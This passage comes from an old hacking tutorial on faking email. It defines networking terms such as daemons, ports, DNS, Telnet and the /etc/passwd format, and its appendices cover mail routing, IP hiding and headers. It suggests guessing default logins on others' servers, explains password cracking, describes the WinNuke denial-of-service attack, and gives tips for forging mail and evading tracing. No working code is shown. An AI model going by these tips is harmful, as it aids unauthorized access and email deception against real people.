(note: I've made up this hostname(10) and all the details regarding it
simply to teach you about daemon banners. I really don't know whether
there is such a hostname and whether the details I'm about to give you are
correct). On port 23 you would usually find Telnet(19). Telnet is a
service which at first asks you for a username and a password on most
cases (unless you typed in an "unpassworded" username. In that case it
will simply log you in as that user without requesting for a password) and
then runs a program specified by the sysadmin(22) and let's you work with
it. In most cases you will get into a text-based shell (a command
interpreter(20)). The problem is: you cannot do ANYTHING. It all depends
on what kinds of permissions the user that you are logged in as has. The
user root(14) has all permissions (read everything, write (and delete)
everything, execute everything and change other people's
permissions).
Okay, so let's try going to port 23 on someone.com. At
first we get this:
Welcome to someone.com, running FreeBSD
4.13
Login:
Aha! Someone.com is running an operating system
called FreeBSD 4.13! That has to be worth something (we might come across
a bug report regarding a bug that exists on FreeBSD 4.13 and might enable
us to hack this server at a certain point). Every piece of information
about a webserver is important.
Now, since we don't know a username and
a password for this server we could either terminate the connection or try
guessing. Most servers have a guest account (username: guest, password:
guest or just username: guest) or a newuser account (username: newuser,
password: newuser, or just username: newuser), but that certainly won't
help us hack these guys... unless there's a major hole in these accounts.
You'll have to figure these things out by yourself.
Note about the
word server: a computer is called a server if it offers any services. If
not, it is called a host.
5. Timeout - okay, so I've got a daemon(1)
waiting on port(2) 23 for incoming connections. Now, what happens if
someone connects to it and does absolutely nothing? He would simply remain
connected to that daemon until one of us either reboots or closes the
connection. You don't want anyone connecting to some port on your computer
and just hanging there, do you? This would only waste valuable
bandwidth(15)!
Most people will not want to monitor their network
status 24 hours a day and disconnect everyone who decides to hang around
for a while (especially on large networks). This is why timeout was
invented.
By setting a timeout value to a daemon (this can be done
during the setup process or by running a setup program or entering some
sort of an options box) you can make it close the connection on anyone who
connets to it and does nothing for over than the timeout value. For
example: you put a daemon on port 17 and tell it to timeout after 2.5
seconds. If someone will connect to your daemon and will not type anything
for over than 2.5 seconds the daemon will close down the connection and
that person will have to reconnect and start typing something before the
daemon times out and throws him out.
This is why webservers have a
short timeout of 2 seconds (most people connect to webservers using client
programs(16), and these programs "type" really fast...).
6. TCP -
stands for Transfer Control Protocol. TCP is a protocol that is used for
transferring data through networks (the Internet, local networks etc').
TCP is much more reliable than UDP since it uses several precautions, such
as sequence numbers and all sorts of nifty header flags and all (see the
excellent article called 'IP Spoofing Demystified' at the Books Section in
http://blacksun.box.sk for lots of info regarding TCP (a real MUST
READ!!)).
TCP's only disadvantage is that it is a bit slower than UDP,
but it is more reliable, hence it is used to transfer sensitive files
(such as programs - if you lose a single bit of the file, the whole thing
is useless).
7. UDP - stands for User Datagram Protocol. UDP is a
protocol that is used for transferring data through networks (the
Internet, local networks etc'). UDP is less reliable than TCP (see the
excellent article called 'IP Spoofing Demystified' at the Books Section in
http://blacksun.box.sk for lots of info regarding UDP (a real MUST
READ!!)), but it is also a little faster, hence programs such as Real
Player (see http://www.real.com) use it for streaming video and more,
where losing a single packet(32) or two is not such a big deal.
8.
ICMP - stands for Internet Control Message Protocol. A protocol used for
transferring errors over a network (the Internet, local networks
etc').
9. IP address - every computer connected to the Internet has
an IP address. If another computer wants to interact with your computer it
will need your IP, just like you need another person's phone number to
call him.
IP addresses should look like that: x.x.x.x, where x can be a
number between 0 to 255. Note: there are "special" IP addresses which
aren't use to connect to other computers. For example: 127.0.0.1 means
localhost, which means you (your computer). Connecting to a certain
port(2) on the IP 127.0.0.1 will connect to that port on your
computer.
Oh, by the way, IP stands for Internet
Protocol(18).
10. Hostname - hey, guess what! I just found out this
really cool site! But I can't remember it's IP address, and when I do, I
hate typing in these long IP addresses(9). Sure, I can bookmark it, but
what if I'll want to tell my friends about it? Or what if I'll be surfing
from my friend's house or from a public place and I won't have my
bookmarks? The answer to all of these questions is hostnames.
Hostnames
are aliases to IP addresses. A list of hostnames and their IP addresses is
located at InterNIC, which is a database of all hostnames and their IP
addresses.
When you type in a hostname, your computer will look up that
hostname and find the appropriate IP address and then connect to
it.
But instead of having to overload InterNIC (imagine that the entire
world will connect to them. This would surely overload their servers and
they will have to spend money on constant upgrades and backups. And think
what will happen if something bad will happen to their databases...). The
solution for this problem is called DNS servers(17).
11. Finding
out what your ISP's mail servers are - there are several ways to do
this:
1) Call your ISP and ask them what is the IP address(9) or the
hostname(10) of your outgoing mail server (this is the IP/hostname you
will need to perform all the tricks in this tutorial). If you want to know
a different ISP's mail server, call their tech support phone number. But
what if they're on the other side of the world and you don't feel like
spending tons of cash simply for calling them and being put on hold? In
this case, try method 3.
2) Start up your mail client, go to your
preferences page and find what it says in the 'outgoing mail' field or in
the 'SMTP server' field (both are the same. SMTP stands for Simple Mail
Transfer Protocl, which is a protocol(18) that is used to send Emails over
the Internet).
3) Guessing. If your target server is someone.com, their
mail server should either be mailgw.someone.com:25 (mailgw.someone.com on
port(2) 25. Note: mailgw stands for mail gateway) or someone.com:25. If
not, send an Email to admin@someone.com or support@someone.com and ask
them what their mail server is (they should be happy to answer you, unless
you tell them that you're an evil hacker or something. In that case
they'll call the cops on you).
Note: not every server on the planet has
an outgoing mail server.
12. Portscanner - a program that scans a
target for open ports(2) by trying to connect to it on various ports. The
simplest portscanner will start at port 1 and climbs up, but you can tell
more advanced portscanners to scan a specific range, give you some info on
open ports it might find etc'.
13. Services scanner - a services
scanner is much more sophisticated than a portscanner(12) since it tries
to connect on predefined ports which should have the service(3) you're
looking for on them.
14. Root - an account on Unix computers which
has maximum priviledges (read any file, write (and delete) to any file,
execute any file and change other users' permissions). Note: other
accounts may have root access, and the root account may not always have
root access, depending on the sysadmin(22) (but root is the default
account for root access).
15. Bandwidth - the total amount of speed
a network connection device (a modem, a network card, a mail pigeon etc')
can get to. For example: I just bought a new modem. It has a bandwidth of
100Ks per second, meaning it can transfer up to 100Ks per second.
When
you use your network device to do something it will drain some of the
bandwidth in order to do this operation.
16. Client program - a
program that connects to a certain service(3). Most client programs would
know how to communicate with that service with or without the information
it will receive from the daemon banner(4).
Example: an Internet browser
(such as Netscape) is a client program because it connects to port(2) 80,
where the webserver daemon(1) is waiting for connections, and interacts
with it in order to retrieve the file you're looking for. A browser has to
know how to communicate with the webserver daemon (also referred to as
HTTPD, HTTP Daemon. HTTP stands for Hyper Text(23) Transfer Protocol) in
order to fulfill your requests.
17. DNS server - a server that
stores hostnames(10) and their IP addresses(11). Instead of having
InterNIC's servers handle the entire planet, every ISP has a DNS
server.
When you type in a hostname and tell your modem to connect to
it, your computer will perform an action called 'DNS Lookup'. In other
words, it will ask your ISP's DNS server what is the appropriate IP
address for the hostname you've typed in. If your ISP's DNS server will
not know the answer, it will ask a higher-level DNS server. If the
higher-level DNS server will not know the answer, it will ask an even
higher-level DNS server, etc' etc' etc'. The highest level is InterNIC
itself.
If the DNS server knew the IP in the first place it would give
it to you. If it didn't (and it only found it out after querying other
servers), it will first add it to his own databases and then give it to
you.
18. Protocol - a set of rules used for computers to interact
with each other over a network of some sort (such as the Internet or a
some kind of a local network) they need to know a common protocol and each
computer has to assume that the other one knows this protocol and uses it.
19. Telnet - a program that in it's most simplicity allows you to
form a text-based connection between your computer and another computer
over a network of some sort. You may choose the IP address(9) or
hostname(10) and the port(2) you wish to contact, and Telnet will
establish a TCP(6) connection between both machines.
Note about the
Telnet daemon(1): the Telnet daemon is completely different. It waits for
incoming TCP(6) or UDP(7) connections on port 23 and then asks the user
for a login (often called a username) and a password (unless the user
typed in an unpassworded username. In that case, he will get in without
entering a password. Unpassworded accounts are often VERY limited) and
then proceed to execute a program (usually a command interpreter(20)) and
giving you some permissions, all depending on the username and the
password you have entered (unless you gave in the wrong details. In that
case, you will be told that either the username or the password are wrong
and be given another try. Most systems give you three tries and then
quit).
20. Command interpreter - a program that accepts commands
from the user and turns them into real commands your computer
understands.
For example: if your command interpreter contains a
command called, say, display, which accepts a single parameter which
should be a filename, and you type in 'display somefile' (without the
quotes, and replace somefile with a real filename) then it will translate
this command into 'okay mr. computer, find the hard drive by doing this
and this, go to the FAT (File Allocation Table) and find out in which
sector/sectors this file is located, grab the file and send it to the
terminal device (the specified output device, usually your monitor)'. Get
the main idea?
21. Shell account - an account on a remote computer (a
username and a password and a bunch of personal configuration files and
stuff). Having a shell account on a remote computer means having the
ability to telnet(19) into that computer on port 23, type in your
account's login (also referred to as a username) and password and getting
a command interpreter(20) with some permissions (depending on the
sysadmin(22)).
22. Sysadmin / admin - the man/woman/furry creature
who is in charge of a system.
23. Hyper Text - if you've ever seen
an HTML document you should know what hyper text is, but you might not be
aware of it. HTML stands for Hyper Text Markup Language. Hyper text is
considered as "enhanced text", since you can add pictures, colors, links
etc' to it. Compare that to the regular and dull text format which this
tutorial uses... :D
24. RFC - stands for Request For Comment. These
are draft papers by the IETF (Internet Engineering Task Force - those guys
who set all those Internet standards and stuff). They contain suggestions
for Internet standards.
You can search for RFCs at
http://www.linuxberg.com.
25. InterNIC - the domain registration
database and the highest DNS(17) server on the planet. 26. Sub domain -
first class domains look like this: something.com (or other extensions,
such as org, net, cc, co.uk etc'). It costs 70$ to register one (see
http://www.networksolutions.com). Second class domains look like this:
someone.something.com and they cost 0$ to register, if you already have
something.com registered to you, of course (although you can get those for
free on websites such as www.anrki.com). Third class domains look like
this: blah.someone.something.com and they don't cost any money either,
etc' etc' etc'.
Note about the price of a first-class domain: this
price does not include web hosting (someone who will host your website or
whatever you want to put up on his server).
27. SSH - stands for
Secure Shell. This daemon(2) waits for incoming TCP(6) or UDP(7)
connections on port 22. Once you connect to it, you will be asked for a
Login and a Password, just like the Telnet daemon(19) does, only SSH
encrypts everything for increased security.
28. Moderated mailing
list / message board - I'll explain this by giving you an example. BugTraq
(see http://www.securityfocus.com) is one of the best security-related
mailing list. Although people can "send things to the list" (meaning send
an Email message and have it sent to all the members of the mailing list),
you can't just send everything. Aleph1, the moderator, goes through all
incoming messages and posts only the good ones.
The same goes with
moderated message boards, etc'.
29. DoS attack - DoS stands for
Denial of Service (also referred to as a "nuke" or a "newk"). A DoS attack
is some kind of an attack that causes the target computer to deny some/all
kinds of services to the users of that computer (local and/or remote
users).
For example: Winnuke (also known as OOB), the simplest DoS in
the world.
(Taken from Spikeman's DoS site) This denial of service
program affects Windows clients by sending an "Out of Band" exception
message to port 139, which does not know how to handle it. This is a
standard listening port on Windows operating systems. Users of Win 3.11,
Win95, and Win NT are vulnerable to this attack. This program is basically
a nuisance program, but it is being widely circulated over the internet
now. It has become a bother in chatrooms and on IRC. By using your IP# and
sending OOB data to port 139, malicious users can disconnect you from the
net, often leaving you with low resources and the blue tinted screen. Some
of you may have been victims already. If this happens to you on Win 95,
you will see a Windows fatal error message similar to the
following:
Fatal exception 0E at 0028: in VxD MSTCP(01) +
000041AE.
This was called from 0028: in VxD NDIS(01) +
00000D7C.
Rebooting the comp should return it to normal
state.
Patches ("fixes") For WinNuke (OOB)
-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=
Additional Information on
WinNuke
http://support.microsoft.com/support/kb/articles/Q168/7/47.asp
Windows 95
Patches
http://support.microsoft.com/download/support/mslfiles/Vipup11.exe
http://support.microsoft.com/download/support/mslfiles/Vipup20.exe
(for Winsock
2.0*)
http://www.theargon.com/defense/nuke/index.html
Please read
notes referring to 95 patches before installing.
Which version of
Winsock do you have on your Windows 95 PC?
http://premium.microsoft.com/support/kb/articles/Q177/7/19.asp
http://www.theargon.com/defense/nuke/index.html
Windows
NT 4.0
Patch
http://support.microsoft.com/support/kb/articles/Q143/4/78.asp
http://www.theargon.com/defense/nuke/index.html
Please
read notes referring to Windows NT patches before installing.
More
info on DoS attacks can be found at Spikeman's DoS site:
http://www.genocide2600.com/~spikeman/main.html
* I really don't
know if this patch will work on newer versions of Winsock. Therefore I'd
like to recommend that you will first downgrade to Winsock 1.1 (the one
that comes with Windows 95) by going to Control Panel, Network and
removing TCP/IP and Dial Up Adapter(30) and then re-adding them by
clicking add, choose protocol and in the company frame choose Microsoft.
Then look for an option called TCP/IP and double-click it. As for DUN
(Dial Up Networking), do the same but choose adapter instead of
protocol.
After you finish downgrading re-upgrade to Winsock 2.0, apply
the patch (Vipup20.exe) and then upgrade to newer versions of
Winsock.
30. DUN - stands for Dial Up Adapter. DUN is the program
that comes with Windows and dials to your ISP in case you have a dial-up
account(31).
31. Dial-Up account - a dial-up account at an ISP
means that your modem has to dial some phone number before you can get on
the net. Unlike other ISP accounts (direct cables which keep you online
for 24 hours a day), you get a dynamic IP address(9) (and not a static one
like on direct cable connections) since you have to connect and disconnect
instead of just staying online all the time. Every time you re-connect you
are assigned with a different IP address.
32. Packet - a piece of
data that travels over a network (such as the Internet or local/wide area
networks). A packet consists of two main parts: the header and the data
itself. The header contains all sorts of nifty values such as the TTL
(Time To Live) and more (you can read about those in the Modem Speedup
section at http://blacksun.box.sk). The data part contains the actual data
that the packet is carrying.
On a regular dial-up account(31), the size
of a packet should be 576 bytes (including the header), but on direct
cable connections a packet would be much bigger (again, see Modem Speedup
section at blacksun.box.sk).
33. Unix password files - Every Unix
system has a password file. They contain a list of users, their passwords
and some important information about them. The password file is located at
/etc/passwd. Each line represents a user.
Each line consists of 7
fields, seperated by : marks (commas).
A line in a password file should
look like this:
Username:encrypted password:UID:GID:short
description:home directory:shell
Username - the user's
username.
Encrypted password - the user's password (encrypted for
higher security). An encrypted password is always 13 characters
long.
UID - User ID. Each user has an ID number. If your UID is 0 it
means you have root access(14). GID - Group ID. You can set groups (for
example: all the workers in the accounting division) and set special
permissions to that entire group. Root has GID 0.
Short description -
short description in human language.
Home directory - the directory
where all of the user's personal configuration files are held. Shell - a
program that is executed once the user logs in. In most cases (and in this
case too) the shell is a command interpreter(20).
In our case, the
encrypted password field is empty, which means that the user gets to log
in by simply giving a username. This can be changed after we log in by
typing passwd to the command interpreter. You will then be asked for a
password to be set for your account.
Note: on some systems, you have to
type passwd your-username instead of simply typing passwd. Note 2: root
can do passwd your-username and change your-username's password, no matter
who your-username is.
Note 3: if you put any characters that are not of
the following sets: '. / 0-9 a-z A-Z' (without the quotes) or if you don't
put anything in, the account is disabled so that user cannot log
in.
This is used when you know you might want to enable this account in
the future.
Cracking the encrypted
password
<><><><><><><><><><><><><><><><
For
this you need a password cracker. A password cracker is a program that
takes a certain word out of a dictionary file (also referred to as a
"wordlist") or a combination of letters, numbers etc' the program makes up
systematically ("brute-force cracking"), encrypts it the way Unix encrypts
passwords and then compares it to the passwords in a given password file.
If the passwords match, it will announce the correct password for that
username.
34. Thread - right now I'm talking about threads in
discussion lists and message boards, not on computer programs. We'll
discuss about these in a later time (maybe). A thread is a series of posts
which started out from a single one. Let me demonstrate: a person starts a
thread by stating a fact or making an opinion. Then, another person comes
into the discussion list or into the message board and states his opinion
on the subject. Then another person joins in and reply to the replier's
opinion. Then another one comes, but chooses to reply to the original
message instead since he has nothing to say regarding the other messages
(if he does, he can post two messages). You get the
picture...
Appendix A: Fake
Daemons(1)
===========================
I found these two fake
daemons (Sendmail and Telnet(19)) at packetstorm.securify.com once.
They're great to fool attackers and to play tricks on your
friends.
These are Perl (a programming language) programs.
To
execute them (no, executing a file doesn't have anything to do with
killing it...) on Unix, simply type ./filename and replace filename with
the name of the file you wish to execute. Every Unix "flavor",
"distribution" or whatever you want to call it, comes with Perl (I think.
Correct me if I'm wrong: barakirs@netvision.net.il).
To execute them
under DOS/Windows, you have to download Active Perl from
www.activeperl.com and then simply double click them.
I don't know how
to execute them under Mac. I guess Active Perl supports Macs, but I'm not
sure.
Now, on to the fake daemons.
These two daemons came in
a single package together with a readme file. Following are all three
files. I did not alter any of those files, it's up to you to do so. Play
with them and learn. Oh, by the way, if you wish to learn Perl (or any
other programming language), head off to http://blacksun.box.sk and find
the books section.
Enjoy!
Appendix B: Routing
Mail
========================
You can make your mail go through many
different servers in order to make the header longer and confuse people
who would try to track it down.
Example: if you want to send the fake
mail to blah@blah.com, and route it through blaha.com, blahb.com and
blahc.com, then in the 'rcpt to:' part, simply do this:
@blaha.com,@blahb.com,@blahc.com:blah@blah.com
Note: this will not work
on every Sendmail daemon.
Thanks to Magnus Kristiansen for this one!
;-)
Appendix C: Faking your
IP
==========================
So you don't want people to find your
IP and your hostname when they look at the full header? Then simply fake
your IP!
You can do this by using Wingates or SOCKS firewalls, or
telnetting to the Sendmail daemon from a shell account. If you use either
one of those, the full header will show the Wingate's/SOCKS
firewall's/shell provider's IP address.
If you find a shell account
that allows you to telnet out of it, you can use it to fake your IP.
Otherwise, use Wingates or SOCKS firewalls. To learn more about then, read
our Proxy/Wingate/SOCKS tutorial and our anonymity tutorial at
blacksun.box.sk.
Also, we recommend going to the books section on our
website and downloading the excellent item called "IP Spoofing
Demystified". The stuff written in there may not be so practical, but it
is very important reading (you will learn a lot of important stuff that
you could use later).
Appendix D:
Reply-to
====================
The Reply-to option does the
following: when a person receives an Email with a reply-to address and
sends a reply, the reply is sent to the address specified within the
Reply-to command (this does not work on really really old Email
clients).
To use it, simply insert this line:
Reply-to:
some-user@some-server.net and replace some-user and some-server.net with
the appropriate user and server. You have to include this line before or
after the "Subject:" part.
Appendix E: CC and
BCC
======================
CC is used to send a message to other
people that are not the recipients of the message, but might need the
information in it.
BCC is used the same way, only people can only see
the recipient.
The B in BCC stands for Blind, while the CC stands for
Carbon Copy (like when you copy a page using... nevermind). So BCC stands
for Blind Carbon Copy while CC stands for Carbon Copy. Exciting, isn't it?
Thanks to i2tb for this information.
Want to use CCs and BCCs within
your fake Emails? No problem!
They work exactly the same as the
Reply-to command in Appendix D. Simply put CC: or BCC: lines in your fake
mail (inside the body of the message), and then insert the appropriate
Email addresses.
References
==========
RFC 821 - the SMTP
RFC. Can be found at http://freesoft.org/CIE/RFC/821/index.htm. Thanks for
Chris Karwoski for this one.
;-)
|